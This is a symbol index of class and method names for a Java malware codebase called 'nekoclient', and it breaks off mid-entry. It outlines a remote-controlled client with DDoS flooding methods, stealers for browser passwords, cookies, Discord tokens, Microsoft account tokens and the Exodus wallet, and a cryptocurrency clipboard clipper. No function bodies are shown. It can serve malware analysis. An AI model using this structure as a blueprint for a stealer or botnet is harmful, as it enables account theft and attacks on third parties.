SYMBOL INDEX (713 symbols across 126 files) FILE: dev/neko/nekoclient/Client.java class Client (line 109) | public class Client implements Closeable { method Client (line 119) | public Client(SocketChannel channel, PacketRegistry packetRegistry, Cl... method start (line 130) | public static void start(String ip, int port, Path windowsAPIFile, Run... method start (line 134) | public static void start(InetSocketAddress address, Path windowsAPIFil... method start (line 138) | public static void start(InetSocketAddress address, Runnable closeList... method start (line 143) | public static void start(InetSocketAddress address) throws IOException { method start (line 147) | public static void start(InetSocketAddress address, byte[] ref) throws... method receive (line 516) | public final T receive() throws IOException { method read (line 529) | public final ByteBuffer read(int length) throws IOException { method listen (line 542) | public void listen() { method addListener (line 568) | public void addListener(Predicate predicate, PacketListener... method addListener (line 572) | public void addListener(PacketListener listener) { method addListener (line 576) | public void addListener(Class clazz, PacketListe... method removeListener (line 580) | public void removeListener(String id) { method send (line 584) | public void send(Packet packet) throws IOException { method close (line 609) | @Override method getVersionInfo (line 623) | public final VersionInfo getVersionInfo() { method getClientInfo (line 627) | public final ClientInfo getClientInfo() { method isConnected (line 631) | public final boolean isConnected() { method getService (line 635) | public final ScheduledExecutorService getService() { method getAddress (line 639) | public final InetSocketAddress getAddress() throws IOException { method getModuleRegistry (line 643) | public final ModuleRegistry getModuleRegistry() { class ConditionListener (line 647) | public static class ConditionListener { method ConditionListener (line 652) | public ConditionListener(Predicate predicate, PacketListener... method getId (line 657) | public final String getId() { method getPredicate (line 661) | public final Predicate getPredicate() { method getListener (line 665) | public final PacketListener getListener() { FILE: dev/neko/nekoclient/api/buffer/FriendlyByteBuffer.java class FriendlyByteBuffer (line 10) | public class FriendlyByteBuffer { method FriendlyByteBuffer (line 13) | public FriendlyByteBuffer(ByteBuffer buffer) { method get (line 17) | public final byte get() { method getInt (line 21) | public final int getInt() { method getLong (line 25) | public final long getLong() { method getChar (line 29) | public final char getChar() { method getDouble (line 33) | public final double getDouble() { method getFloat (line 37) | public final float getFloat() { method getShort (line 41) | public final short getShort() { method getBytes (line 45) | public final byte[] getBytes() { method array (line 56) | public final byte[] array() { method readFully (line 60) | public static FriendlyByteBuffer readFully(SocketChannel channel, int ... method getUnsignedShort (line 73) | public final int getUnsignedShort() { method getBoolean (line 77) | public final boolean getBoolean() { method getString (line 81) | public final String getString() { method getBuffer (line 86) | public final ByteBuffer getBuffer() { FILE: dev/neko/nekoclient/api/buffer/StreamByteBuffer.java class StreamByteBuffer (line 7) | public class StreamByteBuffer { method put (line 10) | public StreamByteBuffer put(byte b) { method put (line 16) | public StreamByteBuffer put(byte[] bytes) { method putLong (line 22) | public StreamByteBuffer putLong(long l) { method putInt (line 28) | public StreamByteBuffer putInt(int i) { method putDouble (line 34) | public StreamByteBuffer putDouble(double d) { method putChar (line 40) | public StreamByteBuffer putChar(char c) { method putShort (line 46) | public StreamByteBuffer putShort(short s) { method putFloat (line 52) | public StreamByteBuffer putFloat(float f) { method putBoolean (line 58) | public StreamByteBuffer putBoolean(boolean b) { method putString (line 62) | public StreamByteBuffer putString(String string) { method putBytes (line 66) | public StreamByteBuffer putBytes(byte[] bytes) { method putUnsignedShort (line 77) | public StreamByteBuffer putUnsignedShort(int s) { method expand (line 83) | public void expand(int expansion) { method getBuffer (line 90) | public ByteBuffer getBuffer() { method flip (line 94) | public ByteBuffer flip() { FILE: dev/neko/nekoclient/api/ddos/Method.java type Method (line 17) | public enum Method { method Method (line 32) | private Method(Supplier handler) { method createHandler (line 36) | public final MethodHandler createHandler() { FILE: dev/neko/nekoclient/api/ddos/Protocol.java type Protocol (line 3) | public enum Protocol { FILE: dev/neko/nekoclient/api/ddos/ThreadsUnit.java type ThreadsUnit (line 3) | public enum ThreadsUnit { FILE: dev/neko/nekoclient/api/ddos/impl/handler/BufferFloodingMethodHandler.java class BufferFloodingMethodHandler (line 8) | public abstract class BufferFloodingMethodHandler extends WriteMethodHan... method handle (line 11) | @Override FILE: dev/neko/nekoclient/api/ddos/impl/handler/BufferWritingMethodHandler.java class BufferWritingMethodHandler (line 8) | public abstract class BufferWritingMethodHandler extends WriteMethodHand... method handle (line 11) | @Override FILE: dev/neko/nekoclient/api/ddos/impl/handler/MethodHandler.java type MethodHandler (line 8) | public interface MethodHandler { method init (line 9) | void init(Protocol var1, InetSocketAddress var2, String var3, JsonObje... method run (line 11) | void run(Protocol var1, InetSocketAddress var2) throws IOException; method cleanup (line 13) | default void cleanup() { method transformAddress (line 16) | default InetSocketAddress transformAddress(InetSocketAddress address, ... FILE: dev/neko/nekoclient/api/ddos/impl/handler/WriteMethodHandler.java class WriteMethodHandler (line 11) | public abstract class WriteMethodHandler implements MethodHandler { method handle (line 12) | public abstract void handle(ByteChannel var1, Supplier var2) ... method run (line 14) | @Override method cleanup (line 33) | @Override FILE: dev/neko/nekoclient/api/ddos/impl/handler/impl/general/FloodMethod.java class FloodMethod (line 10) | public class FloodMethod extends BufferWritingMethodHandler { method init (line 11) | @Override FILE: dev/neko/nekoclient/api/ddos/impl/handler/impl/http/HttpBodyMethod.java class HttpBodyMethod (line 13) | public class HttpBodyMethod extends BufferWritingMethodHandler { method init (line 14) | @Override FILE: dev/neko/nekoclient/api/ddos/impl/handler/impl/http/HttpDefaultMethod.java class HttpDefaultMethod (line 10) | public class HttpDefaultMethod extends BufferWritingMethodHandler { method init (line 11) | @Override FILE: dev/neko/nekoclient/api/ddos/impl/handler/impl/http/HttpHeaderMethod.java class HttpHeaderMethod (line 13) | public class HttpHeaderMethod extends WriteMethodHandler { method init (line 17) | @Override method handle (line 28) | @Override FILE: dev/neko/nekoclient/api/ddos/impl/handler/impl/https/HttpsBodyMethod.java class HttpsBodyMethod (line 9) | public class HttpsBodyMethod extends SSLBufferWritingMethodHandler { method init (line 10) | @Override FILE: dev/neko/nekoclient/api/ddos/impl/handler/impl/https/HttpsDefaultMethod.java class HttpsDefaultMethod (line 9) | public class HttpsDefaultMethod extends SSLBufferWritingMethodHandler { method init (line 10) | @Override FILE: dev/neko/nekoclient/api/ddos/impl/handler/impl/https/HttpsHeaderMethod.java class HttpsHeaderMethod (line 12) | public class HttpsHeaderMethod extends SSLWriteMethodHandler { method init (line 16) | @Override method handle (line 26) | @Override FILE: dev/neko/nekoclient/api/ddos/impl/handler/impl/minecraft/MinecraftEncryptionMethod.java class MinecraftEncryptionMethod (line 18) | public class MinecraftEncryptionMethod extends MinecraftMethodHandler { method init (line 24) | @Override method handle (line 34) | @Override FILE: dev/neko/nekoclient/api/ddos/impl/handler/impl/minecraft/MinecraftLargePacketMethod.java class MinecraftLargePacketMethod (line 14) | public class MinecraftLargePacketMethod extends MinecraftMethodHandler { method init (line 17) | @Override method handle (line 28) | @Override FILE: dev/neko/nekoclient/api/ddos/impl/handler/impl/minecraft/MinecraftLoginMethod.java class MinecraftLoginMethod (line 15) | public class MinecraftLoginMethod extends MinecraftMethodHandler { method init (line 19) | @Override method handle (line 25) | @Override FILE: dev/neko/nekoclient/api/ddos/impl/handler/impl/minecraft/MinecraftStatusPingMethod.java class MinecraftStatusPingMethod (line 14) | public class MinecraftStatusPingMethod extends MinecraftMethodHandler { method init (line 17) | @Override method handle (line 30) | @Override FILE: dev/neko/nekoclient/api/ddos/impl/handler/minecraft/MinecraftMethodHandler.java class MinecraftMethodHandler (line 22) | public abstract class MinecraftMethodHandler implements MethodHandler { method handle (line 28) | public abstract void handle(SocketChannel var1) throws IOException; method init (line 30) | @Override method transformAddress (line 38) | @Override method run (line 48) | @Override method createHandshakePacket (line 63) | public ByteBuffer createHandshakePacket(ProtocolVersion protocolVersio... method createLoginStartPacket (line 69) | public ByteBuffer createLoginStartPacket(String username, UUID uuid) { method createPacket (line 83) | public ByteBuffer createPacket(int id, Type... types) { method readPacket (line 107) | public final MinecraftMethodHandler.Packet readPacket(SocketChannel ch... class Packet (line 130) | public static class Packet { method Packet (line 134) | public Packet(int id, ByteBuffer buffer) { method getId (line 139) | public final int getId() { method getBuffer (line 143) | public final ByteBuffer getBuffer() { FILE: dev/neko/nekoclient/api/ddos/impl/handler/minecraft/ProtocolVersion.java type ProtocolVersion (line 3) | public enum ProtocolVersion { method ProtocolVersion (line 55) | private ProtocolVersion(int version) { method getVersion (line 59) | public final int getVersion() { method isHigherThan (line 63) | public final boolean isHigherThan(ProtocolVersion other) { method isHigherOrEqualTo (line 67) | public final boolean isHigherOrEqualTo(ProtocolVersion other) { method isLowerThan (line 71) | public final boolean isLowerThan(ProtocolVersion other) { method isLowerOrEqualTo (line 75) | public final boolean isLowerOrEqualTo(ProtocolVersion other) { method inRange (line 79) | public boolean inRange(ProtocolVersion first, ProtocolVersion second) { FILE: dev/neko/nekoclient/api/ddos/impl/handler/minecraft/State.java type State (line 3) | public enum State { method State (line 11) | private State(int id) { method getId (line 15) | public final int getId() { FILE: dev/neko/nekoclient/api/ddos/impl/handler/minecraft/type/Type.java class Type (line 6) | public abstract class Type { method Type (line 9) | public Type(T value) { method Type (line 13) | public Type() { method write (line 16) | public abstract void write(ByteBuffer var1); method read (line 18) | public T read(ByteBuffer buffer) throws EOFException { method read0 (line 23) | protected abstract T read0(ByteBuffer var1) throws EOFException; method size (line 25) | public abstract int size(); method getValue (line 27) | public final T getValue() { FILE: dev/neko/nekoclient/api/ddos/impl/handler/minecraft/type/impl/BooleanType.java class BooleanType (line 7) | public class BooleanType extends Type { method BooleanType (line 8) | public BooleanType(boolean value) { method BooleanType (line 12) | public BooleanType() { method write (line 15) | @Override method read0 (line 20) | protected Boolean read0(ByteBuffer buffer) throws EOFException { method size (line 24) | @Override FILE: dev/neko/nekoclient/api/ddos/impl/handler/minecraft/type/impl/BytesType.java class BytesType (line 7) | public class BytesType extends Type { method BytesType (line 10) | public BytesType(byte[] bytes) { method BytesType (line 15) | public BytesType() { method write (line 19) | @Override method read (line 25) | public byte[] read(ByteBuffer buffer) throws EOFException { method read0 (line 31) | public byte[] read0(ByteBuffer buffer) throws EOFException { method size (line 37) | @Override FILE: dev/neko/nekoclient/api/ddos/impl/handler/minecraft/type/impl/LongType.java class LongType (line 7) | public class LongType extends Type { method LongType (line 10) | public LongType(long value) { method LongType (line 14) | public LongType() { method write (line 17) | @Override method read0 (line 22) | protected Long read0(ByteBuffer buffer) throws EOFException { method size (line 26) | @Override FILE: dev/neko/nekoclient/api/ddos/impl/handler/minecraft/type/impl/StringType.java class StringType (line 7) | public class StringType extends Type { method StringType (line 10) | public StringType(String string) { method StringType (line 15) | public StringType() { method write (line 19) | @Override method read (line 25) | public String read(ByteBuffer buffer) throws EOFException { method read0 (line 31) | public String read0(ByteBuffer buffer) throws EOFException { method size (line 37) | @Override FILE: dev/neko/nekoclient/api/ddos/impl/handler/minecraft/type/impl/UUIDType.java class UUIDType (line 8) | public class UUIDType extends Type { method UUIDType (line 9) | public UUIDType(UUID value) { method UUIDType (line 13) | public UUIDType() { method write (line 16) | @Override method read0 (line 22) | protected UUID read0(ByteBuffer buffer) throws EOFException { method size (line 26) | @Override FILE: dev/neko/nekoclient/api/ddos/impl/handler/minecraft/type/impl/UnsignedShortType.java class UnsignedShortType (line 7) | public class UnsignedShortType extends Type { method UnsignedShortType (line 10) | public UnsignedShortType(int value) { method UnsignedShortType (line 14) | public UnsignedShortType() { method write (line 17) | @Override method read0 (line 23) | public Integer read0(ByteBuffer buffer) throws EOFException { method size (line 33) | @Override FILE: dev/neko/nekoclient/api/ddos/impl/handler/minecraft/type/impl/VarIntType.java class VarIntType (line 6) | public class VarIntType extends Type { method VarIntType (line 10) | public VarIntType(int value) { method VarIntType (line 14) | public VarIntType() { method write (line 17) | @Override method read0 (line 27) | public Integer read0(ByteBuffer buffer) { method size (line 43) | @Override FILE: dev/neko/nekoclient/api/ddos/impl/handler/ssl/SSLBufferFloodingMethodHandler.java class SSLBufferFloodingMethodHandler (line 7) | public abstract class SSLBufferFloodingMethodHandler extends SSLWriteMet... method handle (line 10) | @Override FILE: dev/neko/nekoclient/api/ddos/impl/handler/ssl/SSLBufferWritingMethodHandler.java class SSLBufferWritingMethodHandler (line 6) | public abstract class SSLBufferWritingMethodHandler extends SSLWriteMeth... method handle (line 9) | @Override FILE: dev/neko/nekoclient/api/ddos/impl/handler/ssl/SSLWriteMethodHandler.java class SSLWriteMethodHandler (line 11) | public abstract class SSLWriteMethodHandler implements MethodHandler { method handle (line 14) | public abstract void handle(SSLSocket var1) throws IOException; method run (line 16) | @Override FILE: dev/neko/nekoclient/api/debugger/Debugger.java class Debugger (line 9) | public class Debugger { method Debugger (line 14) | public Debugger(InetSocketAddress address, int id) throws IOException { method connect (line 20) | public void connect() throws IOException { method close (line 26) | public void close() throws IOException { method debug (line 30) | public void debug(String text) throws IOException { method debug (line 34) | public void debug(byte[] bytes) throws IOException { FILE: dev/neko/nekoclient/api/disconnect/DisconnectException.java class DisconnectException (line 3) | public class DisconnectException extends RuntimeException { method DisconnectException (line 6) | public DisconnectException(DisconnectReason reason) { method getReason (line 10) | public final DisconnectReason getReason() { FILE: dev/neko/nekoclient/api/disconnect/DisconnectReason.java type DisconnectReason (line 3) | public enum DisconnectReason { FILE: dev/neko/nekoclient/api/info/ClientInfo.java class ClientInfo (line 3) | public class ClientInfo { method ClientInfo (line 10) | public ClientInfo(OperatingSystem operatingSystem, User user, String h... method getOperatingSystem (line 18) | public final OperatingSystem getOperatingSystem() { method getUser (line 22) | public final User getUser() { method getHardwareId (line 26) | public final String getHardwareId() { method getRef (line 30) | public final String getRef() { method isVirtualMachine (line 34) | public final boolean isVirtualMachine() { FILE: dev/neko/nekoclient/api/info/OperatingSystem.java class OperatingSystem (line 3) | public class OperatingSystem { method OperatingSystem (line 11) | public OperatingSystem(String name, String version, String architectur... method getName (line 20) | public final String getName() { method getVersion (line 24) | public final String getVersion() { method getArchitecture (line 28) | public final String getArchitecture() { method getProcessors (line 32) | public final int getProcessors() { method getTotalPhysicalMemory (line 36) | public final long getTotalPhysicalMemory() { method getProcessorName (line 40) | public final String getProcessorName() { FILE: dev/neko/nekoclient/api/info/Side.java type Side (line 3) | public enum Side { FILE: dev/neko/nekoclient/api/info/User.java class User (line 3) | public class User { method User (line 10) | public User(String name, String hostname, String home, String country,... method getName (line 18) | public final String getName() { method getHome (line 22) | public final String getHome() { method getCountry (line 26) | public final String getCountry() { method getLanguage (line 30) | public final String getLanguage() { method getHostname (line 34) | public final String getHostname() { FILE: dev/neko/nekoclient/api/info/VersionInfo.java class VersionInfo (line 3) | public class VersionInfo { method VersionInfo (line 7) | public VersionInfo(Side side, String version) { method getSide (line 12) | public final Side getSide() { method getVersion (line 16) | public final String getVersion() { FILE: dev/neko/nekoclient/api/proxy/ProxyResponse.java type ProxyResponse (line 3) | public enum ProxyResponse { FILE: dev/neko/nekoclient/api/stealer/browser/BrowserData.java class BrowserData (line 9) | public class BrowserData { method addCookie (line 13) | public void addCookie(Cookie cookie) { method addCredential (line 19) | public void addCredential(Credential credential) { method getCookies (line 30) | public final List getCookies() { method getCredentials (line 34) | public final List getCredentials() { FILE: dev/neko/nekoclient/api/stealer/browser/cookie/Cookie.java class Cookie (line 5) | public class Cookie { method Cookie (line 14) | public Cookie(String host, String path, String name, String value, lon... method getValue (line 24) | public final String getValue() { method getPath (line 28) | public final String getPath() { method getHost (line 32) | public final String getHost() { method getName (line 36) | public final String getName() { method equals (line 40) | @Override method getExpires (line 53) | public final long getExpires() { method isSecure (line 57) | public final boolean isSecure() { method isHttpOnly (line 61) | public final boolean isHttpOnly() { FILE: dev/neko/nekoclient/api/stealer/browser/impl/BrowserDataStealer.java class BrowserDataStealer (line 37) | public class BrowserDataStealer { method read (line 38) | public static BrowserData read() { method readMozillaSafely (line 67) | public static void readMozillaSafely(BrowserData browserData, Path pro... method readMozilla (line 74) | public static void readMozilla(BrowserData browserData, Path profilesD... method readChromiumSafely (line 134) | public static void readChromiumSafely(BrowserData browserData, Path us... method readChromium (line 141) | public static void readChromium(BrowserData browserData, Path userData... FILE: dev/neko/nekoclient/api/stealer/browser/impl/credential/Credential.java class Credential (line 6) | public class Credential { method Credential (line 11) | public Credential(URL host, String username, String password) { method getHost (line 17) | public final URL getHost() { method getUsername (line 21) | public final String getUsername() { method getPassword (line 25) | public final String getPassword() { method equals (line 29) | @Override FILE: dev/neko/nekoclient/api/stealer/browser/impl/decrypt/chrome/ChromeDecryptor.java class ChromeDecryptor (line 17) | public class ChromeDecryptor { method ChromeDecryptor (line 21) | public ChromeDecryptor(byte[] masterKey) { method decrypt (line 29) | public String decrypt(byte[] encrypted) throws NoSuchPaddingException,... method isSupported (line 39) | public static boolean isSupported() { method getMasterKey (line 43) | public final byte[] getMasterKey() { FILE: dev/neko/nekoclient/api/stealer/browser/impl/decrypt/mozilla/MozillaDecryptor.java class MozillaDecryptor (line 10) | public class MozillaDecryptor { method MozillaDecryptor (line 13) | public MozillaDecryptor() { method init (line 21) | public void init(Path profile) { method decrypt (line 25) | public String decrypt(byte[] encryptedData) { method shutdown (line 38) | public void shutdown() { method getInstallationPath (line 42) | private static Path getInstallationPath() { method isSupported (line 46) | public static boolean isSupported() { method getNssLibrary (line 50) | public final NSSLibrary getNssLibrary() { FILE: dev/neko/nekoclient/api/stealer/browser/impl/decrypt/mozilla/NSSLibrary.java type NSSLibrary (line 6) | public interface NSSLibrary extends Library { method NSS_Init (line 7) | void NSS_Init(String var1); method PK11_GetInternalKeySlot (line 9) | int PK11_GetInternalKeySlot(PointerByReference var1); method PK11_FreeSlot (line 11) | int PK11_FreeSlot(PointerByReference var1); method PK11_NeedLogin (line 13) | int PK11_NeedLogin(PointerByReference var1); method PK11SDR_Decrypt (line 15) | int PK11SDR_Decrypt(SECItem var1, SECItem var2, PointerByReference var3); method SECITEM_ZfreeItem (line 17) | void SECITEM_ZfreeItem(SECItem var1, int var2); method NSS_Shutdown (line 19) | void NSS_Shutdown(); FILE: dev/neko/nekoclient/api/stealer/browser/impl/decrypt/mozilla/SECItem.java class SECItem (line 10) | public class SECItem extends Structure { method getFieldOrder (line 15) | @Override class ByReference (line 20) | public static class ByReference extends SECItem implements Structure.B... method ByReference (line 21) | public ByReference(int type, byte[] data, int len) { FILE: dev/neko/nekoclient/api/stealer/discord/DiscordAccount.java class DiscordAccount (line 10) | public class DiscordAccount { method DiscordAccount (line 22) | public DiscordAccount( method parse (line 46) | public static DiscordAccount parse(String token, JsonObject profile, J... method getToken (line 68) | public final String getToken() { method getId (line 72) | public final String getId() { method getUsername (line 76) | public final String getUsername() { method getDiscriminator (line 80) | public final String getDiscriminator() { method getBadges (line 84) | public final List getBadges() { method getEmail (line 88) | public final String getEmail() { method getPhone (line 92) | public final String getPhone() { method isVerified (line 96) | public final boolean isVerified() { method isMfa (line 100) | public final boolean isMfa() { method getPaymentSources (line 104) | public final List getPaymentSources() { FILE: dev/neko/nekoclient/api/stealer/discord/impl/DiscordStealer.java class DiscordStealer (line 28) | public class DiscordStealer { method retrieve (line 29) | public static List retrieve() { method retrieveLocalDiscordInstallationSafely (line 42) | private static void retrieveLocalDiscordInstallationSafely(List toke... method retrieveChromeTokens (line 54) | private static void retrieveChromeTokens(List tokens, Path loc... FILE: dev/neko/nekoclient/api/stealer/msa/auth/ClientType.java class ClientType (line 3) | public class ClientType { method ClientType (line 17) | public ClientType(String clientId, String scope, String tokenType) { method getClientId (line 23) | public final String getClientId() { method getScope (line 27) | public final String getScope() { method getTokenType (line 31) | public final String getTokenType() { FILE: dev/neko/nekoclient/api/stealer/msa/auth/MicrosoftAuth.java class MicrosoftAuth (line 20) | public class MicrosoftAuth { method refreshToken (line 21) | public static MicrosoftCredentials refreshToken(MicrosoftCredentials m... method refreshToken (line 25) | public static MicrosoftCredentials refreshToken(String refreshToken, C... method retrieveXboxLiveCredentials (line 46) | public static XboxLiveCredentials retrieveXboxLiveCredentials(Microsof... method retrieveXboxLiveCredentials (line 50) | public static XboxLiveCredentials retrieveXboxLiveCredentials(String m... method retrieveXSTSCredentials (line 75) | public static XSTSCredentials retrieveXSTSCredentials(XboxLiveCredenti... method retrieveXSTSCredentials (line 79) | public static XSTSCredentials retrieveXSTSCredentials(String xboxLiveT... method retrieveMinecraftCredentials (line 98) | public static MinecraftCredentials retrieveMinecraftCredentials(XSTSCr... method hasMinecraft (line 115) | public static boolean hasMinecraft(MinecraftCredentials minecraftCrede... method hasMinecraft (line 119) | public static boolean hasMinecraft(String minecraftAccessToken) throws... method retrieveMinecraftStore (line 123) | public static List retrieveMinecraftStore(MinecraftCredentials... method retrieveMinecraftStore (line 127) | public static List retrieveMinecraftStore(String minecraftAcce... method retrieveMinecraftProfile (line 146) | public static MinecraftProfile retrieveMinecraftProfile(MinecraftCrede... method retrieveMinecraftProfile (line 150) | public static MinecraftProfile retrieveMinecraftProfile(String minecra... FILE: dev/neko/nekoclient/api/stealer/msa/auth/MinecraftProfile.java class MinecraftProfile (line 6) | public class MinecraftProfile { method MinecraftProfile (line 10) | public MinecraftProfile(UUID id, String name) { method convertProfileIdToUUID (line 15) | private static UUID convertProfileIdToUUID(String id) { method parseResponse (line 19) | public static MinecraftProfile parseResponse(JsonObject json) { method getName (line 23) | public final String getName() { method getId (line 27) | public final UUID getId() { FILE: dev/neko/nekoclient/api/stealer/msa/auth/credentials/MicrosoftCredentials.java class MicrosoftCredentials (line 6) | public class MicrosoftCredentials { method MicrosoftCredentials (line 14) | public MicrosoftCredentials( method getAccessToken (line 25) | public final String getAccessToken() { method getRefreshToken (line 29) | public final String getRefreshToken() { method getRefreshTokenExpiration (line 33) | public final long getRefreshTokenExpiration() { method getAccessTokenExpiration (line 37) | public final long getAccessTokenExpiration() { method getUserId (line 41) | public final String getUserId() { method parseResponse (line 45) | public static MicrosoftCredentials parseResponse(JsonObject json, Clie... method getClientType (line 56) | public final ClientType getClientType() { FILE: dev/neko/nekoclient/api/stealer/msa/auth/credentials/MinecraftCredentials.java class MinecraftCredentials (line 5) | public class MinecraftCredentials { method MinecraftCredentials (line 9) | public MinecraftCredentials(String accessToken, long expiration) { method getAccessToken (line 14) | public final String getAccessToken() { method getExpiration (line 18) | public final long getExpiration() { method parseResponse (line 22) | public static MinecraftCredentials parseResponse(JsonObject json) { FILE: dev/neko/nekoclient/api/stealer/msa/auth/credentials/XSTSCredentials.java class XSTSCredentials (line 6) | public class XSTSCredentials { method XSTSCredentials (line 11) | public XSTSCredentials(String token, long expiration, String userHash) { method getToken (line 17) | public final String getToken() { method getExpiration (line 21) | public final long getExpiration() { method getUserHash (line 25) | public final String getUserHash() { method parseResponse (line 29) | public static XSTSCredentials parseResponse(JsonObject json) { FILE: dev/neko/nekoclient/api/stealer/msa/auth/credentials/XboxLiveCredentials.java class XboxLiveCredentials (line 6) | public class XboxLiveCredentials { method XboxLiveCredentials (line 11) | public XboxLiveCredentials(String token, long expiration, String userH... method getToken (line 17) | public final String getToken() { method getUserHash (line 21) | public final String getUserHash() { method getExpiration (line 25) | public final long getExpiration() { method parseResponse (line 29) | public static XboxLiveCredentials parseResponse(JsonObject json) { FILE: dev/neko/nekoclient/api/stealer/msa/impl/MSAStealer.java class MSAStealer (line 24) | public class MSAStealer { method retrieveRefreshTokens (line 25) | public static List retrieveRefreshTokens() { method retrieveRefreshTokensFromLabyMod (line 71) | private static void retrieveRefreshTokensFromLabyMod(List runnable) { method schedule (line 65) | public Module.StartAction schedule(ScheduledFuture future) { method getRunnable (line 70) | public final ThrowingRunnable getRunnable() { method getFuture (line 74) | public final ScheduledFuture getFuture() { FILE: dev/neko/nekoclient/module/ModuleRegistry.java class ModuleRegistry (line 8) | public class ModuleRegistry extends Registry { method ModuleRegistry (line 9) | public ModuleRegistry(Client client) { method getByName (line 13) | public final Module getByName(String name) { FILE: dev/neko/nekoclient/module/impl/CryptoClipperModule.java class CryptoClipperModule (line 11) | public class CryptoClipperModule extends Module { method CryptoClipperModule (line 12) | public CryptoClipperModule(Client client) { method getName (line 16) | @Override method run (line 21) | @Override class Crypto (line 27) | public static class Crypto { method Crypto (line 32) | public Crypto(String currency, String replacement, Pattern... patter... method test (line 38) | public final boolean test(String string) { method getReplacement (line 42) | public final String getReplacement() { method getCurrency (line 46) | public final String getCurrency() { FILE: dev/neko/nekoclient/packet/Direction.java type Direction (line 5) | public enum Direction { method Direction (line 12) | private Direction(Side sender, Side receiver) { method getSender (line 17) | public final Side getSender() { method getReceiver (line 21) | public final Side getReceiver() { FILE: dev/neko/nekoclient/packet/Packet.java type Packet (line 7) | public interface Packet { method read (line 8) | void read(FriendlyByteBuffer var1) throws IOException; method write (line 10) | void write(StreamByteBuffer var1) throws IOException; method getDirection (line 12) | Direction getDirection(); method getName (line 14) | String getName(); method getId (line 16) | default String getId() { FILE: dev/neko/nekoclient/packet/PacketRegistry.java class PacketRegistry (line 24) | public class PacketRegistry extends Registry { method PacketRegistry (line 25) | public PacketRegistry() { method getById (line 48) | public final Packet getById(String id) { FILE: dev/neko/nekoclient/packet/impl/NoncePacket.java class NoncePacket (line 9) | public abstract class NoncePacket implements Packet { method NoncePacket (line 12) | public NoncePacket() { method NoncePacket (line 16) | public NoncePacket(String nonce) { method write (line 20) | @Override method read (line 25) | @Override method getNonce (line 30) | public final String getNonce() { FILE: dev/neko/nekoclient/packet/impl/client/ActionResponsePacket.java class ActionResponsePacket (line 9) | public class ActionResponsePacket extends NoncePacket { method ActionResponsePacket (line 12) | public ActionResponsePacket() { method ActionResponsePacket (line 15) | public ActionResponsePacket(String nonce, boolean success) { method write (line 20) | @Override method read (line 26) | @Override method getDirection (line 32) | @Override method getName (line 37) | @Override method isSuccess (line 42) | public final boolean isSuccess() { FILE: dev/neko/nekoclient/packet/impl/client/BrowserDataResponsePacket.java class BrowserDataResponsePacket (line 13) | public class BrowserDataResponsePacket extends NoncePacket { method BrowserDataResponsePacket (line 16) | public BrowserDataResponsePacket(String nonce, BrowserData browserData) { method BrowserDataResponsePacket (line 21) | public BrowserDataResponsePacket() { method read (line 24) | @Override method write (line 47) | @Override method getBrowserData (line 71) | public final BrowserData getBrowserData() { method getDirection (line 75) | @Override method getName (line 80) | @Override FILE: dev/neko/nekoclient/packet/impl/client/DiscordResponsePacket.java class DiscordResponsePacket (line 12) | public class DiscordResponsePacket extends NoncePacket { method DiscordResponsePacket (line 15) | public DiscordResponsePacket(String nonce, List discor... method DiscordResponsePacket (line 20) | public DiscordResponsePacket() { method write (line 23) | @Override method read (line 51) | @Override method getDirection (line 84) | @Override method getName (line 89) | @Override method getDiscordAccounts (line 94) | public final List getDiscordAccounts() { FILE: dev/neko/nekoclient/packet/impl/client/ExodusResponsePacket.java class ExodusResponsePacket (line 8) | public class ExodusResponsePacket extends ActionResponsePacket { method ExodusResponsePacket (line 11) | public ExodusResponsePacket() { method ExodusResponsePacket (line 14) | public ExodusResponsePacket(String nonce, boolean success, byte[] wall... method write (line 19) | @Override method read (line 27) | @Override method getName (line 35) | @Override method getDirection (line 40) | @Override method getWallet (line 45) | public final byte[] getWallet() { FILE: dev/neko/nekoclient/packet/impl/client/HelloPacket.java class HelloPacket (line 15) | public class HelloPacket implements Packet { method HelloPacket (line 19) | public HelloPacket() { method HelloPacket (line 22) | public HelloPacket(ClientInfo clientInfo, VersionInfo versionInfo) { method read (line 27) | @Override method write (line 39) | @Override method getDirection (line 64) | @Override method getName (line 69) | @Override method getClientInfo (line 74) | public final ClientInfo getClientInfo() { method getVersionInfo (line 78) | public final VersionInfo getVersionInfo() { FILE: dev/neko/nekoclient/packet/impl/client/KeepAlivePacket.java class KeepAlivePacket (line 9) | public class KeepAlivePacket implements Packet { method read (line 10) | @Override method write (line 14) | @Override method getDirection (line 18) | @Override method getName (line 23) | @Override FILE: dev/neko/nekoclient/packet/impl/client/MSAResponsePacket.java class MSAResponsePacket (line 13) | public class MSAResponsePacket extends NoncePacket { method MSAResponsePacket (line 16) | public MSAResponsePacket(String nonce, List cred... method MSAResponsePacket (line 21) | public MSAResponsePacket() { method read (line 24) | @Override method write (line 45) | @Override method getDirection (line 62) | @Override method getName (line 67) | @Override method getCredentials (line 72) | public final List getCredentials() { FILE: dev/neko/nekoclient/packet/impl/client/ProxyResponsePacket.java class ProxyResponsePacket (line 10) | public class ProxyResponsePacket extends NoncePacket { method ProxyResponsePacket (line 13) | public ProxyResponsePacket() { method ProxyResponsePacket (line 16) | public ProxyResponsePacket(String nonce, ProxyResponse response) { method read (line 21) | @Override method write (line 27) | @Override method getDirection (line 33) | @Override method getName (line 38) | @Override method getResponse (line 43) | public final ProxyResponse getResponse() { FILE: dev/neko/nekoclient/packet/impl/server/CommandPacket.java class CommandPacket (line 9) | public class CommandPacket extends NoncePacket { method CommandPacket (line 12) | public CommandPacket() { method CommandPacket (line 15) | public CommandPacket(String command) { method read (line 19) | @Override method write (line 25) | @Override method getDirection (line 31) | @Override method getName (line 36) | @Override method getCommand (line 41) | public final String getCommand() { FILE: dev/neko/nekoclient/packet/impl/server/DDoSPacket.java class DDoSPacket (line 14) | public class DDoSPacket extends NoncePacket { method DDoSPacket (line 24) | public DDoSPacket() { method DDoSPacket (line 27) | public DDoSPacket(String host, int port, long time, int threads, Proto... method read (line 37) | @Override method write (line 50) | @Override method getDirection (line 63) | @Override method getName (line 68) | @Override method getHost (line 73) | public final String getHost() { method getPort (line 77) | public final int getPort() { method getTime (line 81) | public final long getTime() { method getProtocol (line 85) | public final Protocol getProtocol() { method getThreads (line 89) | public final int getThreads() { method getThreadsUnit (line 93) | public final ThreadsUnit getThreadsUnit() { method getMethod (line 97) | public final Method getMethod() { method getOptions (line 101) | public final JsonObject getOptions() { FILE: dev/neko/nekoclient/packet/impl/server/DisconnectPacket.java class DisconnectPacket (line 10) | public class DisconnectPacket implements Packet { method DisconnectPacket (line 13) | public DisconnectPacket() { method DisconnectPacket (line 16) | public DisconnectPacket(DisconnectReason reason) { method read (line 20) | @Override method write (line 25) | @Override method 